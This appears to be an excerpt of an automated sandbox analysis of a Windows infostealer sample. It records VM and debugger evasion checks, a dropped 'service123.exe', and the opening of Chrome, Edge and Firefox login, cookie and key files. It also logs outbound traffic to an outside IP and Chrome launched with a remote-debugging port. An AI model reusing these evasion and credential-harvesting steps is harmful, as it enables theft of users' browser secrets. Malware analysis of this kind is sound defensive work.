Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Amcache.hve.15.dr Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.15.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.15.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.15.dr Binary or memory string: vmci.sys
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Amcache.hve.15.dr Binary or memory string: vmci.syshbin`
Source: Amcache.hve.15.dr Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.15.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: kFrGefsAK3.exe, 00000001.00000003.1364414079.0000000001CC1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll4
Source: Amcache.hve.15.dr Binary or memory string: VMware20,1
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.15.dr Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.15.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.15.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.15.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.15.dr Binary or memory string: VMware PCI VMCI Bus Device
Source: chrome.exe, 00000004.00000002.1756017903.0000024F243C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllyylZP
Source: Amcache.hve.15.dr Binary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.15.dr Binary or memory string: VMware Virtual RAM
Source: Amcache.hve.15.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: Amcache.hve.15.dr Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
Source: Amcache.hve.15.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
Source: C:\Users\user\Desktop\kFrGefsAK3.exe System information queried: ModuleInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process information queried: ProcessInformation Jump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\kFrGefsAK3.exe Thread information set: HideFromDebugger Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: NTICE
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: SICE
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: SIWVID
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A981E0 LoadLibraryA,GetProcAddress,FreeLibrary,GetLastError,FreeLibrary, 16_2_00A981E0
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A9116C Sleep,Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm,GetStartupInfoA,_cexit,_initterm,exit, 16_2_00A9116C
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A911A3 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 16_2_00A911A3
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A91160 Sleep,SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv, 16_2_00A91160
Source: C:\Users\user\AppData\Local\Temp\service123.exe Code function: 16_2_00A913C9 SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_amsg_exit,_initterm, 16_2_00A913C9
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: procmon.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: msmpeng.exe
Source: kFrGefsAK3.exe, 00000001.00000003.1332883664.000000000782F000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.15.dr Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Source: Yara match File source: dump.pcap, type: PCAP
Source: global traffic TCP traffic: 192.168.2.7:49706 -> 185.121.15.192:80
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.db Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Users\user\Desktop\kFrGefsAK3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior

Remote Access Functionality

Source: C:\Users\user\Desktop\kFrGefsAK3.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: Yara match File source: dump.pcap, type: PCAP